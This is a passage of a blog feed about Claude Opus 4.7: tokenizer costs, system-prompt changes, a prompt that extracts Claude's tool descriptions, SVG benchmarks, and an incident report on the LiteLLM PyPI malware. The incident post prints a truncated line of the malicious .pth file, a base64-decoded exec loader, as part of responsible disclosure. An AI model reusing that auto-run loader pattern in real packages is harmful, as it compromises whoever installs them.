&lt;p&gt;Opus 4.7 uses an updated tokenizer that improves how the model processes text. The tradeoff is that the same input can map to more tokens—roughly 1.0–1.35× depending on the content type.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I pasted the &lt;a href="https://github.com/simonw/research/blob/2cf912666ba08ef0c00a1b51ee07c9a8e64579ef/extract-system-prompts/claude-opus-4-7.md?plain=1"&gt;Opus 4.7 system prompt&lt;/a&gt; into the token counting tool and found that the Opus 4.7 tokenizer used 1.46x the number of tokens as Opus 4.6.&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot of a token comparison tool. Models to compare: claude-opus-4-7 (checked), claude-opus-4-6 (checked), claude-opus-4-5, claude-sonnet-4-6, claude-haiku-4-5. Note: &amp;quot;These models share the same tokenizer&amp;quot;. Blue &amp;quot;Count Tokens&amp;quot; button. Results table — Model | Tokens | vs. lowest. claude-opus-4-7: 7,335 tokens, 1.46x (yellow badge). claude-opus-4-6: 5,039 tokens, 1.00x (green badge)." src="https://static.simonwillison.net/static/2026/claude-token-count.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;Opus 4.7 uses the same pricing is Opus 4.6 - $5 per million input tokens and $25 per million output tokens - but this token inflation means we can expect it to be around 40% more expensive.&lt;/p&gt;
&lt;p&gt;The token counter tool also accepts images. Opus 4.7 has improved image support, described like this:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Opus 4.7 has better vision for high-resolution images: it can accept images up to 2,576 pixels on the long edge (~3.75 megapixels), more than three times as many as prior Claude models.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I tried counting tokens for a 3456x2234 pixel 3.7MB PNG and got an even bigger increase in token counts - 3.01x times the number of tokens for 4.7 compared to 4.6:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Same UI, this time with an uploaded screenshot PNG image. claude-opus-4-7: 4,744 tokens, 3.01x (yellow badge). claude-opus-4-6: 1,578 tokens, 1.00x (green badge)." src="https://static.simonwillison.net/static/2026/claude-token-count-image.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: That 3x increase for images is &lt;em&gt;entirely&lt;/em&gt; due to Opus 4.7 being able to handle higher resolutions. I tried that again with a 682x318 pixel image and it took 314 tokens with Opus 4.7 and 310 with Opus 4.6, so effectively the same cost.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update 2&lt;/strong&gt;: I tried a 15MB, 30 page text-heavy PDF and Opus 4.7 reported 60,934   tokens while 4.6 reported 56,482 - that's a 1.08x multiplier, significantly lower than the multiplier I got for raw text.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-pricing"&gt;llm-pricing&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/tokenization"&gt;tokenization&lt;/a&gt;&lt;/p&gt;



</summary><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="anthropic"/><category term="claude"/><category term="llm-pricing"/><category term="tokenization"/></entry><entry><title>Changes in the system prompt between Claude Opus 4.6 and 4.7</title><link href="https://simonwillison.net/2026/Apr/18/opus-system-prompt/#atom-tag" rel="alternate"/><published>2026-04-18T23:59:40+00:00</published><updated>2026-04-18T23:59:40+00:00</updated><id>https://simonwillison.net/2026/Apr/18/opus-system-prompt/#atom-tag</id><summary type="html">
    &lt;p&gt;Anthropic are the only major AI lab to &lt;a href="https://platform.claude.com/docs/en/release-notes/system-prompts"&gt;publish the system prompts&lt;/a&gt; for their user-facing chat systems. Their system prompt archive now dates all the way back to Claude 3 in July 2024 and it's always interesting to see how the system prompt evolves as they publish new models.&lt;/p&gt;
&lt;p&gt;Opus 4.7 shipped the other day (April 16, 2026) with a &lt;a href="https://claude.ai/"&gt;Claude.ai&lt;/a&gt; system prompt update since Opus 4.6 (February 5, 2026).&lt;/p&gt;
&lt;p&gt;I had Claude Code take &lt;a href="https://platform.claude.com/docs/en/release-notes/system-prompts.md"&gt;the Markdown version of their system prompts&lt;/a&gt;, break that up into separate documents for each of the models and then construct &lt;a href="https://github.com/simonw/research/tree/main/extract-system-prompts#readme"&gt;a Git history&lt;/a&gt; of those files over time with fake commit dates representing the publication dates of each updated prompt - &lt;a href="https://github.com/simonw/research/pull/109#issue-4287908903"&gt;here's the prompt I used&lt;/a&gt; with Claude Code for the web.&lt;/p&gt;
&lt;p&gt;Here is the &lt;a href="https://github.com/simonw/research/commit/888f21161500cd60b7c92367f9410e311ffcff09"&gt;git diff between Opus 4.6 and 4.7&lt;/a&gt;. These are my own highlights extracted from that diff - in all cases text &lt;strong&gt;in bold&lt;/strong&gt; is my emphasis:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The "developer platform" is now called the "Claude Platform".&lt;/li&gt;
&lt;li&gt;The list of Claude tools mentioned in the system prompt now includes "Claude in Chrome - a browsing agent that can interact with websites autonomously, Claude in Excel - a spreadsheet agent, and &lt;strong&gt;Claude in Powerpoint&lt;/strong&gt; - a slides agent. Claude Cowork can use all of these as tools." - Claude in Powerpoint was not mentioned in the 4.6 prompt.&lt;/li&gt;
&lt;li&gt;The child safety section has been greatly expanded, and is now wrapped in a new &lt;code&gt;&amp;lt;critical_child_safety_instructions&amp;gt;&lt;/code&gt; tag. Of particular note: "Once Claude refuses a request for reasons of child safety, all subsequent requests in the same conversation must be approached with extreme caution."&lt;/li&gt;
&lt;li&gt;It looks like they're trying to make Claude less pushy: "If a user indicates they are ready to end the conversation, Claude does not request that the user stay in the interaction or try to elicit another turn and instead respects the user's request to stop."&lt;/li&gt;
&lt;li&gt;The new &lt;code&gt;&amp;lt;acting_vs_clarifying&amp;gt;&lt;/code&gt; section includes:
&lt;blockquote&gt;
&lt;p&gt;When a request leaves minor details unspecified, &lt;strong&gt;the person typically wants Claude to make a reasonable attempt now, not to be interviewed first&lt;/strong&gt;. Claude only asks upfront when the request is genuinely unanswerable without the missing information (e.g., it references an attachment that isn't there).&lt;/p&gt;
&lt;p&gt;When a tool is available that could resolve the ambiguity or supply the missing information — searching, looking up the person's location, checking a calendar, discovering available capabilities — Claude calls the tool to try and solve the ambiguity before asking the person. Acting with tools is preferred over asking the person to do the lookup themselves.&lt;/p&gt;
&lt;p&gt;Once Claude starts on a task, Claude sees it through to a complete answer rather than stopping partway. [...]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/li&gt;
&lt;li&gt;It looks like Claude chat now has a tool search mechanism, as seen in &lt;a href="https://platform.claude.com/docs/en/agents-and-tools/tool-use/tool-search-tool"&gt;this API documentation&lt;/a&gt; and described in &lt;a href="https://www.anthropic.com/engineering/advanced-tool-use"&gt;this November 2025 post&lt;/a&gt;:
&lt;blockquote&gt;
&lt;p&gt;Before concluding Claude lacks a capability — access to the person's location, memory, calendar, files, past conversations, or any external data — &lt;strong&gt;Claude calls tool_search to check whether a relevant tool is available but deferred&lt;/strong&gt;. "I don't have access to X" is only correct after tool_search confirms no matching tool exists.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/li&gt;
&lt;li&gt;There's new language to encourage Claude to be less verbose:
&lt;blockquote&gt;
&lt;p&gt;Claude keeps its responses focused and concise so as to avoid potentially overwhelming the user with overly-long responses. Even if an answer has disclaimers or caveats, Claude discloses them briefly and keeps the majority of its response focused on its main answer.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/li&gt;
&lt;li&gt;This section was present in the 4.6 prompt but has been removed for 4.7, presumably because the new model no longer misbehaves in the same way:
&lt;blockquote&gt;
&lt;p&gt;Claude avoids the use of emotes or actions inside asterisks unless the person specifically asks for this style of communication.&lt;/p&gt;
&lt;p&gt;Claude avoids saying "genuinely", "honestly", or "straightforward".&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/li&gt;
&lt;li&gt;There's a new section about "disordered eating", which was not previously mentioned by name:
&lt;blockquote&gt;
&lt;p&gt;If a user shows signs of disordered eating, Claude should not give precise nutrition, diet, or exercise guidance — no specific numbers, targets, or step-by-step plans - anywhere else in the conversation. Even if it's intended to help set healthier goals or highlight the potential dangers of disordered eating, responses with these details could trigger or encourage disordered tendencies.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/li&gt;
&lt;li&gt;A popular screenshot attack against AI models is to force them to say yes or no to a controversial question. Claude's system prompt now guards against that (in the &lt;code&gt;&amp;lt;evenhandedness&amp;gt;&lt;/code&gt; section):
&lt;blockquote&gt;
&lt;p&gt;If people ask Claude to give a simple yes or no answer (or any other short or single word response) in response to complex or contested issues or as commentary on contested figures, Claude can decline to offer the short response and instead give a nuanced answer and explain why a short response wouldn't be appropriate.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/li&gt;
&lt;li&gt;Claude 4.6 had a section specifically clarifying that "Donald Trump is the current president of the United States and was inaugurated on January 20, 2025", because without that the model's knowledge cut-off date combined with its previous knowledge that Trump falsely claimed to win the 2020 election meant it would deny he was the president. That language is gone for 4.7, reflecting the model's new reliable knowledge cut-off date of January 2026.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="and-the-tool-descriptions-too"&gt;And the tool descriptions too&lt;/h4&gt;
&lt;p&gt;The system prompts published by Anthropic are sadly not the entire story - their published information doesn't include the tool descriptions that are provided to the model, which is arguably an even more important piece of documentation if you want to take full advantage of what the Claude chat UI can do for you.&lt;/p&gt;
&lt;p&gt;Thanfully you can &lt;a href="https://claude.ai/share/dc1e375e-2213-4afb-ac1b-812d42735a8e"&gt;ask Claude directly&lt;/a&gt; - I used the prompt:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;List all tools you have available to you with an exact copy of the tool description and parameters&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;My &lt;a href="https://claude.ai/share/dc1e375e-2213-4afb-ac1b-812d42735a8e"&gt;shared transcript&lt;/a&gt; has full details, but the list of named tools is as follows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;ask_user_input_v0&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;bash_tool&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;conversation_search&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;create_file&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;fetch_sports_data&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;image_search&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;message_compose_v1&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;places_map_display_v0&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;places_search&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;present_files&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;recent_chats&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;recipe_display_v0&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;recommend_claude_apps&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;search_mcp_registry&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;str_replace&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;suggest_connectors&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;view&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;weather_fetch&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;web_fetch&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;web_search&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;tool_search&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;visualize:read_me&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;visualize:show_widget&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I don't believe this list has changed since Opus 4.6.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/prompt-engineering"&gt;prompt-engineering&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/system-prompts"&gt;system-prompts&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="ai"/><category term="prompt-engineering"/><category term="generative-ai"/><category term="llms"/><category term="anthropic"/><category term="claude"/><category term="ai-ethics"/><category term="system-prompts"/></entry><entry><title>Claude system prompts as a git timeline</title><link href="https://simonwillison.net/2026/Apr/18/extract-system-prompts/#atom-tag" rel="alternate"/><published>2026-04-18T12:17:00+00:00</published><updated>2026-04-18T12:17:00+00:00</updated><id>https://simonwillison.net/2026/Apr/18/extract-system-prompts/#atom-tag</id><summary type="html">
    
        &lt;p&gt;&lt;strong&gt;Research:&lt;/strong&gt; &lt;a href="https://github.com/simonw/research/tree/main/extract-system-prompts#readme"&gt;Claude system prompts as a git timeline&lt;/a&gt;&lt;/p&gt;
        &lt;p&gt;Anthropic &lt;a href="https://platform.claude.com/docs/en/release-notes/system-prompts"&gt;publish the system prompts&lt;/a&gt; for Claude chat and make that page &lt;a href="https://platform.claude.com/docs/en/release-notes/system-prompts.md"&gt;available as Markdown&lt;/a&gt;. I had Claude Code turn that page into separate files for each model and model family with fake git commit dates to enable browsing the changes via the GitHub commit view.&lt;/p&gt;
&lt;p&gt;I used this to write my own &lt;a href="https://simonwillison.net/2026/Apr/18/opus-system-prompt/"&gt;detailed notes on the changes between Opus 4.6 and 4.7&lt;/a&gt;.&lt;/p&gt;
    
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/system-prompts"&gt;system-prompts&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="anthropic"/><category term="claude"/><category term="system-prompts"/></entry><entry><title>llm-anthropic 0.25</title><link href="https://simonwillison.net/2026/Apr/16/llm-anthropic/#atom-tag" rel="alternate"/><published>2026-04-16T20:37:12+00:00</published><updated>2026-04-16T20:37:12+00:00</updated><id>https://simonwillison.net/2026/Apr/16/llm-anthropic/#atom-tag</id><summary type="html">
    
        &lt;p&gt;&lt;strong&gt;Release:&lt;/strong&gt; &lt;a href="https://github.com/simonw/llm-anthropic/releases/tag/0.25"&gt;llm-anthropic 0.25&lt;/a&gt;&lt;/p&gt;
        &lt;blockquote&gt;
&lt;ul&gt;
&lt;li&gt;New model: &lt;code&gt;claude-opus-4.7&lt;/code&gt;, which supports &lt;code&gt;thinking_effort&lt;/code&gt;: &lt;code&gt;xhigh&lt;/code&gt;. #66&lt;/li&gt;
&lt;li&gt;New &lt;code&gt;thinking_display&lt;/code&gt; and &lt;code&gt;thinking_adaptive&lt;/code&gt; boolean options. &lt;code&gt;thinking_display&lt;/code&gt; summarized output is currently only available in JSON output or JSON logs.&lt;/li&gt;
&lt;li&gt;Increased default &lt;code&gt;max_tokens&lt;/code&gt; to the maximum allowed for each model.&lt;/li&gt;
&lt;li&gt;No longer uses obsolete &lt;code&gt;structured-outputs-2025-11-13&lt;/code&gt; beta header for older models.&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
    
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/llm"&gt;llm&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="llm"/><category term="anthropic"/><category term="claude"/></entry><entry><title>Qwen3.6-35B-A3B on my laptop drew me a better pelican than Claude Opus 4.7</title><link href="https://simonwillison.net/2026/Apr/16/qwen-beats-opus/#atom-tag" rel="alternate"/><published>2026-04-16T17:16:52+00:00</published><updated>2026-04-16T17:16:52+00:00</updated><id>https://simonwillison.net/2026/Apr/16/qwen-beats-opus/#atom-tag</id><summary type="html">
    &lt;p&gt;For anyone who has been (inadvisably) taking my &lt;a href="https://simonwillison.net/tags/pelican-riding-a-bicycle/"&gt;pelican riding a bicycle benchmark&lt;/a&gt; seriously as a robust way to test models, here are pelicans from this morning's two big model releases - &lt;a href="https://qwen.ai/blog?id=qwen3.6-35b-a3b"&gt;Qwen3.6-35B-A3B from Alibaba&lt;/a&gt; and &lt;a href="https://www.anthropic.com/news/claude-opus-4-7"&gt;Claude Opus 4.7 from Anthropic&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Here's the Qwen 3.6 pelican, generated using &lt;a href="https://huggingface.co/unsloth/Qwen3.6-35B-A3B-GGUF/blob/main/Qwen3.6-35B-A3B-UD-Q4_K_S.gguf"&gt;this 20.9GB Qwen3.6-35B-A3B-UD-Q4_K_S.gguf&lt;/a&gt; quantized model by Unsloth, running on my MacBook Pro M5 via &lt;a href="https://lmstudio.ai/"&gt;LM Studio&lt;/a&gt; (and the &lt;a href="https://github.com/agustif/llm-lmstudio"&gt;llm-lmstudio&lt;/a&gt; plugin) - &lt;a href="https://gist.github.com/simonw/4389d355d8e162bc6e4547da214f7dd2"&gt;transcript here&lt;/a&gt;:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/Qwen3.6-35B-A3B-UD-Q4_K_S-pelican.png" alt="The bicycle frame is the correct shape. There are clouds in the sky. The pelican has a dorky looking pouch. A caption on the ground reads Pelican on a Bicycle!" style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;And here's one I got from Anthropic's &lt;a href="https://www.anthropic.com/news/claude-opus-4-7"&gt;brand new Claude Opus 4.7&lt;/a&gt; (&lt;a href="https://gist.github.com/simonw/afcb19addf3f38eb1996e1ebe749c118"&gt;transcript&lt;/a&gt;):&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/opus-4.7-pelican.png" alt="The bicycle frame is entirely the wrong shape. No clouds, a yellow sun. The pelican is looking behind itself, and has a less pronounced pouch than I would like." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;I'm giving this one to Qwen 3.6. Opus managed to mess up the bicycle frame!&lt;/p&gt;
&lt;p&gt;I tried Opus a second time passing &lt;code&gt;thinking_level: max&lt;/code&gt;. It didn't do much better (&lt;a href="https://gist.github.com/simonw/7566e04a81accfb9affda83451c0f363"&gt;transcript&lt;/a&gt;):&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/opus-4.7-pelican-max.png" alt="The bicycle frame is entirely the wrong shape but in a different way. Lines are more bold. Pelican looks a bit more like a pelican." style="max-width: 100%;" /&gt;&lt;/p&gt;

&lt;h4 id="i-dont-think-qwen-are-cheating"&gt;I don't think Qwen are cheating&lt;/h4&gt;
&lt;p&gt;A lot of people are &lt;a href="https://simonwillison.net/2025/Nov/13/training-for-pelicans-riding-bicycles/"&gt;convinced that the labs train for my stupid benchmark&lt;/a&gt;. I don't think they do, but honestly this result did give me a little glint of suspicion. So I'm burning one of my secret backup tests - here's what I got from Qwen3.6-35B-A3B and Opus 4.7 for "Generate an SVG of a flamingo riding a unicycle":&lt;/p&gt;

&lt;div style="display: flex; gap: 4px;"&gt;
  &lt;figure style="flex: 1; text-align: center; margin: 0;"&gt;
    &lt;figcaption style="margin-bottom: 1em"&gt;Qwen3.6-35B-A3B&lt;br /&gt;(&lt;a href="https://gist.github.com/simonw/f1d1ff01c34dda5fdedf684cfc430d92"&gt;transcript&lt;/a&gt;)&lt;/figcaption&gt;
    &lt;img src="https://static.simonwillison.net/static/2026/qwen-flamingo.png" alt="The unicycle spokes are a too long. The pelican has sunglasses, a bowtie and appears to be smoking a cigarette. It has two heart emoji surrounding the caption Flamingo on a Unicycle. It has a lot of charisma." style="max-width: 100%; height: auto;" /&gt;
  &lt;/figure&gt;
  &lt;figure style="flex: 1; text-align: center; margin: 0;"&gt;
    &lt;figcaption style="margin-bottom: 1em"&gt;Opus 4.7&lt;br /&gt;(&lt;a href="https://gist.github.com/simonw/35121ad5dcf23bf860397a103ae88d50"&gt;transcript&lt;/a&gt;)&lt;/figcaption&gt;
    &lt;img src="https://static.simonwillison.net/static/2026/opus-flamingo.png" alt="The unicycle has a black wheel. The flamingo is a competent if slightly dull vector illustration of a flamingo. It has no flair." style="max-width: 100%; height: auto;" /&gt;
  &lt;/figure&gt;
&lt;/div&gt;


&lt;p&gt;I'm giving this one to Qwen too, partly for the excellent &lt;code&gt;&amp;lt;!-- Sunglasses on flamingo! --&amp;gt;&lt;/code&gt; SVG comment.&lt;/p&gt;

&lt;h4 id="what-can-we-learn-from-this-"&gt;What can we learn from this?&lt;/h4&gt;
&lt;p&gt;The pelican benchmark has always been meant as a joke - it's mainly a statement on how obtuse and absurd the task of comparing these models is.&lt;/p&gt;
&lt;p&gt;The weird thing about that joke is that, for the most part, there has been a direct correlation between the quality of the pelicans produced and the general usefulness of the models. Those &lt;a href="https://simonwillison.net/2024/Oct/25/pelicans-on-a-bicycle/"&gt;first pelicans from October 2024&lt;/a&gt; were junk. The &lt;a href="https://simonwillison.net/tags/pelican-riding-a-bicycle/"&gt;more recent entries&lt;/a&gt; have generally been much, much better - to the point that Gemini 3.1 Pro produces &lt;a href="https://simonwillison.net/2026/Feb/19/gemini-31-pro/"&gt;illustrations you could actually use somewhere&lt;/a&gt;, provided you had a pressing need to illustrate a pelican riding a bicycle.&lt;/p&gt;
&lt;p&gt;Today, even that loose connection to utility has been broken. I have enormous respect for Qwen, but I very much doubt that a 21GB quantized version of their latest model is more powerful or useful than Anthropic's latest proprietary release.&lt;/p&gt;
&lt;p&gt;If the thing you need is an SVG illustration of a pelican riding a bicycle though, right now Qwen3.6-35B-A3B running on a laptop is a better bet than Opus 4.7!&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/local-llms"&gt;local-llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/qwen"&gt;qwen&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pelican-riding-a-bicycle"&gt;pelican-riding-a-bicycle&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-release"&gt;llm-release&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/lm-studio"&gt;lm-studio&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="ai"/><category term="generative-ai"/><category term="local-llms"/><category term="llms"/><category term="anthropic"/><category term="claude"/><category term="qwen"/><category term="pelican-riding-a-bicycle"/><category term="llm-release"/><category term="lm-studio"/></entry><entry><title>datasette.io news preview</title><link href="https://simonwillison.net/2026/Apr/16/datasette-io-preview/#atom-tag" rel="alternate"/><published>2026-04-16T00:18:03+00:00</published><updated>2026-04-16T00:18:03+00:00</updated><id>https://simonwillison.net/2026/Apr/16/datasette-io-preview/#atom-tag</id><summary type="html">
    
        &lt;p&gt;&lt;strong&gt;Tool:&lt;/strong&gt; &lt;a href="https://tools.simonwillison.net/datasette-io-preview"&gt;datasette.io news preview&lt;/a&gt;&lt;/p&gt;
        &lt;p&gt;The &lt;a href="https://datasette.io/"&gt;datasette.io&lt;/a&gt; website has a news section built from this &lt;a href="https://github.com/simonw/datasette.io/blob/main/news.yaml"&gt;news.yaml&lt;/a&gt; file in the underlying GitHub repository. The YAML format looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;- date: 2026-04-15
  body: |-
    [Datasette 1.0a27](https://docs.datasette.io/en/latest/changelog.html#a27-2026-04-15) changes how CSRF protection works in a way that simplifies form and API integration, and introduces a new `RenameTableEvent` for when a table is renamed by a SQL query.
- date: 2026-03-18
  body: |-
    ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This format is a little hard to edit, so I finally &lt;a href="https://claude.ai/share/c96129b9-bcb0-4eba-aee9-4a7ad236dfb7"&gt;had Claude build a custom preview UI&lt;/a&gt; to make checking for errors have slightly less friction.&lt;/p&gt;
&lt;p&gt;I built it using standard &lt;a href="https://claude.ai/"&gt;claude.ai&lt;/a&gt; and Claude Artifacts, taking advantage of Claude's ability to clone GitHub repos and look at their content as part of a regular chat:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;Clone https://github.com/simonw/datasette.io and look at the news.yaml file and how it is rendered on the homepage. Build an artifact I can paste that YAML into which previews what it will look like, and highlights any markdown errors or YAML errors&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;img alt="Screenshot showing two side-by-side views of a datasette.io news preview tool. The left panel shows a dark-themed YAML editor with news entries containing date and body fields in Markdown format, with a red validation error at the bottom indicating the date field has an invalid format. The right panel shows the rendered preview output with formatted headings by date (April 2026, 18th March 2026), displaying 115 news entries with linked release names, inline code snippets, and changelog descriptions. A red badge with &amp;quot;1&amp;quot; appears on the left panel header indicating one validation error." src="https://static.simonwillison.net/static/2026/datasette-io-preview.jpg" /&gt;&lt;/p&gt;
    
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/tools"&gt;tools&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vibe-coding"&gt;vibe-coding&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="tools"/><category term="datasette"/><category term="claude"/><category term="vibe-coding"/></entry><entry><title>My minute-by-minute response to the LiteLLM malware attack</title><link href="https://simonwillison.net/2026/Mar/26/response-to-the-litellm-malware-attack/#atom-tag" rel="alternate"/><published>2026-03-26T23:58:22+00:00</published><updated>2026-03-26T23:58:22+00:00</updated><id>https://simonwillison.net/2026/Mar/26/response-to-the-litellm-malware-attack/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://futuresearch.ai/blog/litellm-attack-transcript/"&gt;My minute-by-minute response to the LiteLLM malware attack&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Callum McMahon reported the &lt;a href="https://simonwillison.net/2026/Mar/24/malicious-litellm/"&gt;LiteLLM malware attack&lt;/a&gt; to PyPI. Here he shares the Claude transcripts he used to help him confirm the vulnerability and decide what to do about it. Claude even suggested the PyPI security contact address after confirming the malicious code in a Docker container:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Confirmed&lt;/strong&gt;. Fresh download from PyPI right now in an isolated Docker container:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Inspecting: litellm-1.82.8-py3-none-any.whl
FOUND: litellm_init.pth
SIZE: 34628 bytes
FIRST 200 CHARS:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The malicious &lt;code&gt;litellm==1.82.8&lt;/code&gt; is &lt;strong&gt;live on PyPI right now&lt;/strong&gt; and anyone installing or upgrading litellm will be infected. This needs to be reported to security@pypi.org immediately.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I was chuffed to see Callum use my &lt;a href="https://github.com/simonw/claude-code-transcripts"&gt;claude-code-transcripts&lt;/a&gt; tool to publish the transcript of the conversation.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=47531967"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


